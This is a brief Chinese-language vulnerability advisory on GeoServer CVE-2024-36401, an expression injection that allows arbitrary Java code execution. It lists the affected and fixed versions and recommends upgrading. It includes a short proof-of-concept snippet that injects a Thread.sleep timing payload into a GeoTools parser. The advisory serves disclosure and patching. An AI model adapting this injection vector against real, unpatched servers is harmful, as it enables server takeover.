【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

发布于 作者:

【漏洞预警】GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

cexlife 飓风网络安全 2024-07-02 19:35

漏洞描述:

GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器,攻击者可构造恶意请求执行任意java代码,控制服务器。

poc:

new org.geotools.xsd.StreamingParser(                        new org.geotools.filter.v1_0.OGCConfiguration(),                        new java.io.ByteArrayInputStream(““.getBytes()),                        “java.lang.Thread.sleep(5000)”)                .parse();

影响范围:

2.25.0 <= GeoServer < 2.25.22.24.0 <= GeoServer < 2.24.4GeoServer < 2.23.6安全版本:GeoServer 2.25.2GeoServer 2.24.4GeoServer 2.23.6修复建议:

建议您更新当前系统或软件至最新版,完成漏洞的修复。

参考链接:

https://osgeo-org.atlassian.net/browse/GEOT-7587